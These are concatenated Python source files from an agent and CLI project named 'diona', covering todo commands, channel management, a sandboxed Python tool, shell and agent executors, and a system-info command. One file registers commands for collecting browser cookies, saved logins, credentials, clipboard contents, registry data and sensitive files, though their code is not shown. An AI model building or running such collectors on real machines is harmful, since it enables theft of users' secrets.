from .model import BaseModelProvider, SubModelProvider, ModelProviderManager, get_model_provider_manager
from .core import CoreAgent, get_core_agent
from .session import SessionManager, get_session_manager, SessionInfo
from .facade import AgentFacade, get_agent_facade
from .middleware import Middleware, MiddlewareContext, ModerationMiddleware, get_middleware_registry
from .sub_agents import get_sub_agent_registry
from .handoffs import get_handoff_registry
from .globals import get_global_memory, get_global_knowledge_center

__all__ = [
    "BaseModelProvider",
    "SubModelProvider",
    "ModelProviderManager",
    "get_model_provider_manager",
    "CoreAgent",
    "get_core_agent",
    "SessionManager",
    "get_session_manager",
    "SessionInfo",
    "AgentFacade",
    "get_agent_facade",
    "Middleware",
    "MiddlewareContext",
    "ModerationMiddleware",
    "get_middleware_registry",
    "get_sub_agent_registry",
    "get_handoff_registry",
    "get_global_memory",
    "get_global_knowledge_center",
]



"""Todo task command for managing global todo tasks"""

from diona.project.cli.commands.base import Command
from diona.project.agent.globals import get_global_todo_task, TaskStatus


class TodoCommand(Command):
    name = "todo"
    description = "Manage global todo tasks"
    
    def execute(self, args):
        if not args:
            return self._show_help()
        
        action = args[0]
        
        if action in ("-h", "--help"):
            return self._show_help()
        elif action == "add":
            return self._add_task(args[1:])
        elif action == "list":
            return self._list_tasks(args[1:])
        elif action == "show":
            return self._show_task(args[1:])
        elif action == "update":
            return self._update_task(args[1:])
        elif action == "delete":
            return self._delete_task(args[1:])
        elif action == "complete":
            return self._complete_task(args[1:])
        elif action == "start":
            return self._start_task(args[1:])
        elif action == "cancel":
            return self._cancel_task(args[1:])
        elif action == "stats":
            return self._show_stats()
        else:
            print(f"Unknown action: {action}")
            return self._show_help()
    
    def _show_help(self):
        help_text = """Usage: todo <action> [options]

Actions:
  add <title> [description]       Add a new task
  list [status]                   List tasks (status: pending, completed, all)
  show <id>                       Show task details
  update <id> [options]           Update task
  delete <id>                     Delete task
  complete <id>                   Mark task as completed
  start <id>                      Mark task as in progress
  cancel <id>                     Cancel a task
  stats                           Show task statistics

Options for update:
  --title <title>                 Update title
  --desc <description>           Update description
  --priority <priority>           Update priority (0-10)

Examples:
  todo add "Buy groceries" "Milk, bread, eggs"
  todo list pending
  todo complete 1
  todo update 1 --title "New title" --priority 5
  todo stats"""
        print(help_text)
        return False
    
    def _add_task(self, args):
        if not args:
            print("Usage: todo add <title> [description]")
            return False
        
        title = args[0]
        description = " ".join(args[1:]) if len(args) > 1 else ""
        
        todo = get_global_todo_task()
        task = todo.add_task(title, description)
        
        print(f"Task created: #{task.id}")
        print(f"  Title: {task.title}")
        print(f"  Status: {task.status.value}")
        
        return False
    
    def _list_tasks(self, args):
        status_filter = None
        if args and args[0] != "all":
            status_map = {
                "pending": TaskStatus.PENDING,
                "completed": TaskStatus.COMPLETED,
                "in_progress": TaskStatus.IN_PROGRESS,
                "cancelled": TaskStatus.CANCELLED,
            }
            status_filter = status_map.get(args[0])
        
        todo = get_global_todo_task()
        tasks = todo.list_tasks(status_filter)
        
        if not tasks:
            print("No tasks found.")
            return False
        
        print(f"=== Tasks ({len(tasks)}) ===")
        for task in tasks:
            status_icon = {
                TaskStatus.PENDING: "[ ]",
                TaskStatus.IN_PROGRESS: "[→]",
                TaskStatus.COMPLETED: "[✓]",
                TaskStatus.CANCELLED: "[×]",
            }
            print(f"  {status_icon.get(task.status, '[?]')} #{task.id} {task.title}")
            if task.description:
                print(f"      {task.description[:50]}")
        
        return False
    
    def _show_task(self, args):
        if not args:
            print("Usage: todo show <id>")
            return False
        
        try:
            task_id = int(args[0])
        except ValueError:
            print("Invalid task ID")
            return False
        
        todo = get_global_todo_task()
        task = todo.get_task(task_id)
        
        if not task:
            print(f"Task #{task_id} not found")
            return False
        
        print(f"=== Task #{task.id} ===")
        print(f"Title: {task.title}")
        print(f"Description: {task.description}")
        print(f"Status: {task.status.value}")
        print(f"Priority: {task.priority}")
        print(f"Created: {task.created_at}")
        print(f"Updated: {task.updated_at}")
        if task.completed_at:
            print(f"Completed: {task.completed_at}")
        
        return False
    
    def _update_task(self, args):
        if len(args) < 2:
            print("Usage: todo update <id> [options]")
            return False
        
        try:
            task_id = int(args[0])
        except ValueError:
            print("Invalid task ID")
            return False
        
        title = None
        description = None
        priority = None
        
        i = 1
        while i < len(args):
            if args[i] == "--title" and i + 1 < len(args):
                title = args[i + 1]
                i += 2
            elif args[i] == "--desc" and i + 1 < len(args):
                description = args[i + 1]
                i += 2
            elif args[i] == "--priority" and i + 1 < len(args):
                try:
                    priority = int(args[i + 1])
                except ValueError:
                    print("Invalid priority")
                    return False
                i += 2
            else:
                i += 1
        
        if not any([title, description, priority is not None]):
            print("No updates provided")
            return False
        
        todo = get_global_todo_task()
        success = todo.update_task(task_id, title, description, priority)
        
        if success:
            print(f"Task #{task_id} updated")
        else:
            print(f"Task #{task_id} not found")
        
        return False
    
    def _delete_task(self, args):
        if not args:
            print("Usage: todo delete <id>")
            return False
        
        try:
            task_id = int(args[0])
        except ValueError:
            print("Invalid task ID")
            return False
        
        todo = get_global_todo_task()
        success = todo.delete_task(task_id)
        
        if success:
            print(f"Task #{task_id} deleted")
        else:
            print(f"Task #{task_id} not found")
        
        return False
    
    def _complete_task(self, args):
        if not args:
            print("Usage: todo complete <id>")
            return False
        
        try:
            task_id = int(args[0])
        except ValueError:
            print("Invalid task ID")
            return False
        
        todo = get_global_todo_task()
        success = todo.mark_completed(task_id)
        
        if success:
            print(f"Task #{task_id} marked as completed")
        else:
            print(f"Task #{task_id} not found")
        
        return False
    
    def _start_task(self, args):
        if not args:
            print("Usage: todo start <id>")
            return False
        
        try:
            task_id = int(args[0])
        except ValueError:
            print("Invalid task ID")
            return False
        
        todo = get_global_todo_task()
        success = todo.mark_in_progress(task_id)
        
        if success:
            print(f"Task #{task_id} marked as in progress")
        else:
            print(f"Task #{task_id} not found")
        
        return False
    
    def _cancel_task(self, args):
        if not args:
            print("Usage: todo cancel <id>")
            return False
        
        try:
            task_id = int(args[0])
        except ValueError:
            print("Invalid task ID")
            return False
        
        todo = get_global_todo_task()
        success = todo.mark_cancelled(task_id)
        
        if success:
            print(f"Task #{task_id} cancelled")
        else:
            print(f"Task #{task_id} not found")
        
        return False
    
    def _show_stats(self):
        todo = get_global_todo_task()
        stats = todo.get_stats()
        
        print("=== Task Statistics ===")
        print(f"Total: {stats.get('total', 0)}")
        print(f"Pending: {stats.get('pending', 0)}")
        print(f"In Progress: {stats.get('in_progress', 0)}")
        print(f"Completed: {stats.get('completed', 0)}")
        print(f"Cancelled: {stats.get('cancelled', 0)}")
        
        return False



from ..base import Command
from diona.project.cli.commands import get_command_registry


class HelpCommand(Command):
    name = "help"
    description = "Show help information"

    def execute(self, args):
        registry = get_command_registry()
        print("Available commands:")
        for cmd in registry.list_all():
            print(f"  /{cmd.name}: {cmd.description}")
        return False



"""Channel manager for managing multiple channels"""

import asyncio
from typing import Any, Optional, Dict, List
from .channel import Channel, ChannelOptions
from .message import Message, MessageType


class ChannelManager:
    """Manager for multiple channels"""
    
    def __init__(self):
        self._channels: Dict[str, Channel] = {}
        self._default_channel: Optional[Channel] = None
        self._running = False
    
    async def create_channel(
        self,
        name: str,
        options: Optional[ChannelOptions] = None,
        auto_start: bool = True
    ) -> Channel:
        """Create a new channel"""
        if name in self._channels:
            return self._channels[name]
        
        channel = Channel(name, options)
        self._channels[name] = channel
        
        if auto_start:
            await channel.start()
        
        return channel
    
    async def get_channel(self, name: str) -> Optional[Channel]:
        """Get channel by name"""
        channel = self._channels.get(name)
        if channel is None:
            channel = await self.create_channel(name)
        return channel
    
    async def delete_channel(self, name: str) -> bool:
        """Delete a channel"""
        channel = self._channels.get(name)
        if channel:
            await channel.stop()
            del self._channels[name]
            return True
        return False
    
    async def start_all(self):
        """Start all channels"""
        self._running = True
        for channel in self._channels.values():
            await channel.start()
    
    async def stop_all(self):
        """Stop all channels"""
        self._running = False
        for channel in self._channels.values():
            await channel.stop()
    
    async def publish(self, channel_name: str, message: Message) -> bool:
        """Publish message to channel"""
        channel = self._channels.get(channel_name)
        if channel:
            return await channel.publish(message)
        return False
    
    async def send(self, channel_name: str, payload: Any, **kwargs) -> bool:
        """Send message to channel"""
        message = Message(channel=channel_name, payload=payload, **kwargs)
        return await self.publish(channel_name, message)
    
    async def broadcast(self, message: Message) -> int:
        """Broadcast message to all channels"""
        count = 0
        for channel in self._channels.values():
            if await channel.publish(message):
                count += 1
        return count
    
    def list_channels(self) -> List[str]:
        """List all channel names"""
        return list(self._channels.keys())
    
    def get_channel_info(self, name: str) -> Optional[Dict]:
        """Get channel information"""
        channel = self._channels.get(name)
        if channel:
            return {
                "name": channel.name,
                "subscriber_count": channel.subscriber_count,
                "queue_size": channel.queue_size,
                "running": channel._running
            }
        return None
    
    @property
    def channel_count(self) -> int:
        """Get number of channels"""
        return len(self._channels)


_manager: Optional[ChannelManager] = None


def get_channel_manager() -> ChannelManager:
    """Get global channel manager"""
    global _manager
    if _manager is None:
        _manager = ChannelManager()
    return _manager



"""Web models for CLI web server"""

from dataclasses import dataclass
from typing import Optional


@dataclass
class CommandRequest:
    """Request model for command execution"""
    command: str


@dataclass
class CommandResponse:
    """Response model for command execution"""
    success: bool
    return_code: int
    stdout: str
    stderr: str
    error_message: Optional[str] = None



"""System information command"""

from typing import Dict, Any
from diona.project.cli.commands import CommandModel, CommandParameter
from diona.system.sensitive.info.SystemVersionInfoImpl import SystemVersionInfoImpl
from diona.system.sensitive.info.NetworkConfigInfoImpl import NetworkConfigInfoImpl
from diona.system.sensitive.info.WirelessNetworkInfoImpl import WirelessNetworkInfoImpl


def get_help() -> str:
    """Get help information for the command"""
    return """
Usage: system_info [OPTIONS]

Get system information including OS and network details.

Options:
  --type TYPE       Information type: all, system, network (default: all)
  --help            Show this help message and exit
        """

def execute(args=None) -> str:
    """Execute system info collection
    
    Args:
        args: Command arguments (can be None, dict, or list of strings)
        
    Returns:
        System information
    """
    import argparse
    
    # Create argument parser
    parser = argparse.ArgumentParser(description="Get system information including OS and network details")
    parser.add_argument('--type', type=str, default='all', choices=['all', 'system', 'network'], help='Information type: all, system, network (default: all)')
    
    # Parse arguments
    if args is None:
        # No arguments provided
        parsed_args = parser.parse_args([])
    elif isinstance(args, list):
        # List of strings (command line arguments)
        try:
            parsed_args = parser.parse_args(args)
        except SystemExit:
            return get_help()
    elif isinstance(args, dict):
        # Dict of arguments
        parsed_args = argparse.Namespace(**args)
    else:
        # Invalid argument type
        return get_help()
    
    # help is handled by argparse automatically
    
    info_type = parsed_args.type
    
    import json
    
    result_data = {
        "summary": f"System information collected (type: {info_type})",
        "details": {},
        "metadata": {
            "info_type": info_type
        }
    }
    
    if info_type == 'all' or info_type == 'system':
        try:
            system_info = SystemVersionInfoImpl()
            info = system_info.get_system_version_info()
            result_data["details"]["system"] = info
        except Exception as e:
            result_data["details"]["system_error"] = str(e)
    
    if info_type == 'all' or info_type == 'network':
        try:
            network_info = NetworkConfigInfoImpl()
            info = network_info.get_network_info()
            result_data["details"]["network"] = info
        except Exception as e:
            result_data["details"]["network_error"] = str(e)
    
    return json.dumps(result_data, ensure_ascii=False, indent=2)


SystemInfoCommand = CommandModel(
    name="system_info",
    description="Get system information",
    implementation=execute,
    parameters=[
        CommandParameter(
            name="type",
            type="str",
            description="Information type: all, system, network",
            required=False,
            default="all"
        ),
        CommandParameter(
            name="help",
            type="bool",
            description="Show help message",
            required=False,
            default=False
        )
    ]
)



"""Python sandbox tool for OpenAI Agent"""

import os
from agents import function_tool
from diona.project.sandbox import Sandbox, SandboxConfig


_home_dir = os.path.expanduser("~")
_diona_dir = os.path.join(_home_dir, ".diona")

_sandbox = Sandbox(
    SandboxConfig(
        timeout=30.0,
        allow_network=False,
    )
)


@function_tool
async def python_sandbox_tool(code: str, timeout: int = 30) -> str:
    """Execute Python code in a secure sandbox environment.
    
    IMPORTANT: All Python code execution MUST use this tool. Do not use shell commands
    like 'python script.py' - instead, paste the Python code directly into this tool.
    
    SECURITY RESTRICTIONS:
    - No file deletion
    - No network access
    - No subprocess execution
    - No access to dangerous modules (os, subprocess, socket, etc.)
    - Limited os module (read-only: listdir, path, environ, getcwd, etc.)
    
    AI USAGE GUIDELINES:
    - ALL Python code must be executed using this tool, not shell commands
    - For Python scripts, paste the code content directly into the 'code' parameter
    - DO NOT use 'python file.py' in shell - use this tool instead
    - DO NOT attempt to delete files
    - DO NOT try to import dangerous modules (os, subprocess, socket, etc.)
    - DO NOT perform network operations
    - Use this tool for Python code execution and data processing
    - Results are returned as strings (stdout/stderr)
    - This is a READ-ONLY(In Fact You can modify files, But Don't allow delete them) sandbox
    
    Args:
        code: The Python code to execute directly
        timeout: Execution timeout in seconds (default: 30)
    
    Returns:
        Execution result (stdout and stderr combined) or error message
    """
    try:
        result = _sandbox.execute_with_timeout(code)
        
        output = ""
        
        if result.stdout:
            output = result.stdout
        
        if result.stderr:
            if output:
                output += "\n\nStderr:\n" + result.stderr
            else:
                output = "Stderr:\n" + result.stderr
        
        if result.error:
            if output:
                output += "\n\nError:\n" + result.error
            else:
                output = "Error:\n" + result.error
        
        if not output:
            output = "(Code executed successfully, no output)"
        
        if result.timed_out:
            output += "\n\nWarning: Execution timed out"
        
        return output
        
    except Exception as e:
        return f"Error executing code: {str(e)}"



from diona.project.cli.engine import get_engine
from diona.project.cli.commands import get_command_registry
from diona.project.cli.facade import CLIFacade, get_cli_facade

_engine = None


def get_cli_engine():
    global _engine
    if _engine is None:
        _engine = get_engine()
    return _engine


class CLI:
    def __init__(self):
        self.running = False
        self._engine = get_cli_engine()

    def run(self):
        from diona.project.cli.io import display_banner
        
        self.running = True
        display_banner()

        while self.running:
            prompt = f"{self._engine.get_prompt_prefix()} "
            try:
                user_input = input(prompt)
                if not user_input.strip():
                    continue

                self._engine.execute_sync(user_input)
            except KeyboardInterrupt:
                print("\nExiting...")
                self.running = False
            except EOFError:
                print("\nExiting...")
                self.running = False

        print("Goodbye!")


__all__ = [
    "CLI",
    "get_cli_engine",
    "get_command_registry",
    "CLIFacade",
    "get_cli_facade",
]



"""Register sensitive module commands"""

from diona.project.cli.register import get_module_command_registry

# Import command classes
from diona.system.sensitive.browser.cookies.command import CookieCollectorCommand
from diona.system.sensitive.browser.history.command import HistoryCollectorCommand
from diona.system.sensitive.browser.logindata.command import LoginDataCollectorCommand
from diona.system.sensitive.clipboard.command import ClipboardCommand
from diona.system.sensitive.credential.command import CredentialCollectorCommand
from diona.system.sensitive.info.command import SystemInfoCommand
from diona.system.sensitive.regedit.command import RegistryCommand
from diona.system.sensitive.runcontext.command import RunContextCommand
from diona.system.sensitive.search.command import SearchCommand
from diona.system.sensitive.sensitivefile.command import SensitiveFileCommand


def register_sensitive_commands():
    """Register sensitive module commands to module_command_registry"""
    registry = get_module_command_registry()
    
    # Register commands
    commands = [
        CookieCollectorCommand,
        HistoryCollectorCommand,
        LoginDataCollectorCommand,
        ClipboardCommand,
        CredentialCollectorCommand,
        SystemInfoCommand,
        RegistryCommand,
        RunContextCommand,
        SearchCommand,
        SensitiveFileCommand
    ]
    
    for command in commands:
        if not registry.has_command(command.name):
            registry.register_command(command)
            # print(f"Registered command: {command.name}")


# Register commands when module is imported
register_sensitive_commands()



import os
import sys
from abc import ABC, abstractmethod
from typing import AsyncIterator
from diona.project.cli.engine.result import ParsedInput, StreamChunk, InputType
from diona.project.cli.commands.base import Command


class ExecutionContext:
    """Execution context for storing command results"""
    
    def __init__(self):
        self._variables = {
            "$0": "0",
            "$1": "",
            "$2": "",
            "$3": "",
        }
    
    def set_result(self, return_code: int, stdout: str, stderr: str, full_result: str = None):
        self._variables["$0"] = str(return_code)
        self._variables["$1"] = stdout
        self._variables["$2"] = stderr
        if full_result is not None:
            self._variables["$3"] = full_result
        else:
            self._variables["$3"] = stdout if stdout else stderr
    
    def get(self, name: str) -> str:
        return self._variables.get(name, "")


_context: ExecutionContext = None


def get_execution_context() -> ExecutionContext:
    global _context
    if _context is None:
        _context = ExecutionContext()
    return _context


class CommandExecutor(ABC):
    @abstractmethod
    def can_execute(self, parsed: ParsedInput) -> bool:
        pass

    @abstractmethod
    async def execute(self, parsed: ParsedInput) -> AsyncIterator[StreamChunk]:
        pass


class BuiltinExecutor(CommandExecutor):
    def can_execute(self, parsed: ParsedInput) -> bool:
        return parsed.input_type == InputType.BUILTIN

    async def execute(self, parsed: ParsedInput) -> AsyncIterator[StreamChunk]:
        from diona.project.cli.commands import get_command_registry
        registry = get_command_registry()
        
        input_with_vars = self._replace_variables(parsed.raw_input)
        
        cmd = registry.get(parsed.command_name)
        
        if cmd is None:
            yield StreamChunk(content=f"Command not found: {parsed.command_name}\n", is_error=True, is_final=True)
            return
        
        try:
            args = input_with_vars.split()[1:] if len(input_with_vars.split()) > 1 else []
            old_stdout = sys.stdout
            old_stderr = sys.stderr
            from io import StringIO
            stdout_capture = StringIO()
            stderr_capture = StringIO()
            sys.stdout = stdout_capture
            sys.stderr = stderr_capture
            
            try:
                result = cmd.execute(args)
            finally:
                sys.stdout = old_stdout
                sys.stderr = old_stderr
            
            stdout_output = stdout_capture.getvalue()
            stderr_output = stderr_capture.getvalue()
            
            context = get_execution_context()
            full_result = str(result) if result is not None else stdout_output
            context.set_result(0, stdout_output, stderr_output, full_result)
            
            if parsed.command_name == "exit":
                yield StreamChunk(content="Goodbye!\n", is_final=True)
            elif stdout_output:
                yield StreamChunk(content=stdout_output, is_final=True)
            elif stderr_output:
                yield StreamChunk(content=stderr_output, is_error=True, is_final=True)
        except Exception as e:
            context = get_execution_context()
            context.set_result(1, "", str(e), str(e))
            yield StreamChunk(content=f"Error: {str(e)}\n", is_error=True, is_final=True)

    def _replace_variables(self, raw_input: str) -> str:
        context = get_execution_context()
        for var_name in ["$0", "$1", "$2", "$3"]:
            if var_name in raw_input:
                raw_input = raw_input.replace(var_name, context.get(var_name))
        return raw_input


class RegisteredExecutor(CommandExecutor):
    """Executor for registered commands from CommandModel"""
    def can_execute(self, parsed: ParsedInput) -> bool:
        return parsed.input_type == InputType.REGISTERED

    async def execute(self, parsed: ParsedInput) -> AsyncIterator[StreamChunk]:
        from diona.project.cli.commands import get_command_registry
        registry = get_command_registry()
        
        input_with_vars = self._replace_variables(parsed.raw_input)
        
        model = registry.get_model(parsed.command_name)
        if model is None:
            yield StreamChunk(content=f"Registered command not found: {parsed.command_name}\n", is_error=True, is_final=True)
            return
        
        try:
            from io import StringIO
            import sys
            
            args = input_with_vars.split()[1:] if len(input_with_vars.split()) > 1 else []
            old_stdout = sys.stdout
            old_stderr = sys.stderr
            stdout_capture = StringIO()
            stderr_capture = StringIO()
            sys.stdout = stdout_capture
            sys.stderr = stderr_capture
            
            try:
                result = model.execute(args)
            finally:
                sys.stdout = old_stdout
                sys.stderr = old_stderr
            
            stdout_output = stdout_capture.getvalue()
            stderr_output = stderr_capture.getvalue()
            
            context = get_execution_context()
            context.set_result(0, stdout_output, stderr_output, str(result))
            
            yield StreamChunk(content=stdout_output, is_final=True)
        except Exception as e:
            yield StreamChunk(content=f"Error: {str(e)}\n", is_error=True, is_final=True)

    def _replace_variables(self, raw_input: str) -> str:
        context = get_execution_context()
        for var_name in ["$0", "$1", "$2", "$3"]:
            if var_name in raw_input:
                raw_input = raw_input.replace(var_name, context.get(var_name))
        return raw_input


class SystemExecutor(CommandExecutor):
    def can_execute(self, parsed: ParsedInput) -> bool:
        return parsed.input_type == InputType.SYSTEM

    async def execute(self, parsed: ParsedInput) -> AsyncIterator[StreamChunk]:
        import subprocess
        
        input_with_vars = self._replace_variables(parsed.raw_input)
        
        try:
            result = subprocess.run(
                input_with_vars,
                capture_output=True,
                text=True,
                shell=True,
                cwd=os.getcwd() if os.name == 'nt' else None
            )
            
            context = get_execution_context()
            full_result = result.stdout if result.stdout else result.stderr
            context.set_result(result.returncode, result.stdout, result.stderr, full_result)
            
            output = result.stdout or result.stderr or "(no output)"
            yield StreamChunk(content=output + "\n", is_final=True)
        except Exception as e:
            yield StreamChunk(content=f"Error: {str(e)}\n", is_error=True, is_final=True)

    def _replace_variables(self, raw_input: str) -> str:
        context = get_execution_context()
        for var_name in ["$0", "$1", "$2", "$3"]:
            if var_name in raw_input:
                raw_input = raw_input.replace(var_name, context.get(var_name))
        return raw_input


class AgentExecutor(CommandExecutor):
    def can_execute(self, parsed: ParsedInput) -> bool:
        return parsed.input_type == InputType.AGENT

    async def execute(self, parsed: ParsedInput) -> AsyncIterator[StreamChunk]:
        from diona.project.agent import get_agent_facade
        facade = get_agent_facade()
        
        try:
            async for token in facade.run_streamed(parsed.raw_input):
                yield StreamChunk(content=token, is_final=False)
            yield StreamChunk(content="", is_final=True)
        except Exception as e:
            yield StreamChunk(content=f"Error: {str(e)}\n", is_error=True, is_final=True)
